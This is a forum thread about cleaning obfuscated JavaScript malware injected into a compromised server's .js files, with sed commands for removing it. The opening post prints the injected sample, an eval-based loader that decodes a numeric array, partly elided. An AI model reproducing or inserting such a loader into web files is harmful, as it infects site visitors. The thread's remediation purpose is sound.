Removing obfuscated javascript from js files


 
Thread Tools Search this Thread
Top Forums Shell Programming and Scripting Removing obfuscated javascript from js files
# 1  
Old 07-02-2012
Removing obfuscated javascript from js files

ello, I am trying to remove obfuscated code in multiple files on a server, the malicious code is surronded by

Code:
/*km0ae9gr6m*//*qhk6sa6g1c*/

I had success removing from some files using this command

Code:
sed -i ':strt;s|/\*km0ae9gr6m\*/[^/]*/\*qhk6sa6g1c\*/||g;/\/\*km0ae9gr6m\*\//{N;b strt}' fileaffected.js

But it failed on this pattern

Code:
/*km0ae9gr6m*/try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;try{bcsd=prototype-2;}catch(bawg){ss=[];f=(h)?("fromCharC"+"ode"):"";e=window["e"+"val"];n=[312,420,100,200,303,440,34,118,96,40,32
...
more bytecode
...
,68,312,420,100,200,303,440,34,118,96,40,32,64,96,128,32,64,96,128,32,64,96,128,100,222,297,468,109,202,330,464,46,196,333,400,121,92,291,448,112,202,330,400,67,208,315,432,100,80,315,408,114,218,123,236,10,64,96,128,32,64,96,128,32,250,30,128,32,64,96,500,99,194,348,396,104,80,303,164,123,250,30,500,44,64,159,192,48,82,177];if(window.document)for(i=6-2-1-2-1;-1771+i!=2-2;i++){k=i;ss=ss+String[f](n[k]/(i%(h*h)+2-1));}e(ss);}}/*qhk6sa6g1c*/

Any suggestions?

Last edited by methyl; 07-02-2012 at 02:17 PM.. Reason: please use code tags
# 2  
Old 07-02-2012
This is not the answer you wanted: But have you considered restoring the files from backup?

You also probably need to run something like rootkit hunter on your system. Otherwise the clean code will be messed up again no time. And you did patch or plug the hole the exploit used to attack your system?
# 3  
Old 07-02-2012
Welcome to the forums, cuantica:

Someone had a similar problem very recently. This post may be of use to you: https://www.unix.com/302662831-post17.html

Regards,
Alister
This User Gave Thanks to alister For This Post:
# 4  
Old 07-02-2012
Thanks Jim, backups are not an option. This issue happened due to a unpatched Plesk box so i decide to move sites to cpanel.

Regarding the thread suggested by Allister I have checked it before posting, and decided to open a new thread as the person trying to fix this was considering 3 lines and in some files the infection uses only one line and using that approach would modify the valid file contents. BTW this seems to be related to my box too, but posted by the person we had delegated administration Smilie

It is safer to remove them using the pattern, it worked fine but I don't know how to escape the scripting at beginning and end of the pattern to just consider
Code:
/*km0ae9gr6m*/malware/*qhk6sa6g1c*/

---------- Post updated at 11:31 AM ---------- Previous update was at 11:02 AM ----------

Any suggestions ?

Last edited by methyl; 07-02-2012 at 02:32 PM.. Reason: code tags ; correct typos in post
# 5  
Old 07-02-2012
I'm no sed expert, but have you tried something like this:

Code:
sed -n '/\/\*km0ae9gr6m\*\//,/\/\*qhk6sa6g1c\*\//!p' filename


This is essentially
Code:
sed -n '/start/,/end/!p'

i.e. Output anything except the lines in the range (inclusive).

The proposed sed escapes every character in the search strings which is special to sed (i.e. / and *).

Tested on your sample data.

Last edited by methyl; 07-02-2012 at 03:49 PM.. Reason: typos
This User Gave Thanks to methyl For This Post:
# 6  
Old 07-02-2012
Login or Register to Ask a Question

Previous Thread | Next Thread

9 More Discussions You Might Find Interesting

1. UNIX for Beginners Questions & Answers

Find and removing the old files and zipping the files using shell script

Hi, I am trying to removing the old files which were older than 10 days and same g zipping the files using the shell script. script was return as follows. find /jboss7_homes/JBOSS7/SKYLIV??/SKYLIV??_CRM/jboss-eap-7.0/standalone/log -mtime +10 -type f | xargs rm -f find /cer_skyliv??/log... (6 Replies)
Discussion started by: venkat918
6 Replies

2. UNIX for Dummies Questions & Answers

Help in Removing the Old files

Hi Gurus, we are planning to clear the old log files based on the year and i need help on this and i searched in google and i came up with the scripts but i am stuck with this. (1) wroks fine How many files exist in based on the extension find -type f | sed -e 's/.*\.//' | sort | uniq... (1 Reply)
Discussion started by: SeenuGuddu
1 Replies

3. Programming

Obfuscated "Hello World!" in Python 2.7.x...

Obfuscated Hello World! in Python 2.7.x This is seriously impressive:- Obfuscating "Hello world!" - Ben Kurtovic (2 Replies)
Discussion started by: wisecracker
2 Replies

4. Web Development

Random - Any help decoding obfuscated code?

I have this following file and I would quite like to get it decoded - any help / advice is appreciated. I would like to know how to decrypt it, however if someone is able to do it for me I would be equally grateful. <?php //Obfuscation provided by FOPO - Free Online PHP Obfuscator v1.2:... (6 Replies)
Discussion started by: mcclunyboy
6 Replies

5. Shell Programming and Scripting

recursively remove javascript from all folder index files

Hi All, A site I manage had some javascript inserted into each folders index file. Can anyone priovide me with some ideas on how to use awk, sed or some other bash script to parse through each of the site folders and remove this code? If I have to do it by hand I'm going to go insane. :eek: ... (2 Replies)
Discussion started by: lsalsich
2 Replies

6. Shell Programming and Scripting

Help with Find/Replace Javascript Injected Strings in mulitple files

Hi, guys, I'm not a high-end programmer, but I've been trying to write a script to remove all of the b.rtbn2.cn (and b.adserv.cn and any future variation) injected script tags on the server. (Still working on security fixes to prevent it in the future, just need to clean up now.) My approach is... (1 Reply)
Discussion started by: zzlegs
1 Replies

7. Web Development

opening text files with javascript

Im aware under IE, javascript uses ActiveX Objects to open up and manipulate text files, excel files etc.. How abouts would I open a text file using javascript in Firefox ? thanks (1 Reply)
Discussion started by: JamesGoh
1 Replies

8. Shell Programming and Scripting

removing old files except configuration files and folders

Dear all, I want to remove files older than 2 months in the /home/member directory. But except the configuration files (like .bash_profile .config/ .openoffice/ .local/ .kde/ etc..) I have tried with the command find . -mtime +60 -wholename './.*' -prune -o -print -exec mv {} \; but it... (1 Reply)
Discussion started by: jamcalicut
1 Replies

9. Programming

Obfuscated C

Well this year i decided to enter the International Obfuscated C Code Contest. This was my first attempt at writing obfuscated C (at least purposely), so I am sure that this is kids-stuff for the real obfuscation gurus. Anyway, the results are out, and I am not a finalist (I wasn't expecting to... (5 Replies)
Discussion started by: PxT
5 Replies
Login or Register to Ask a Question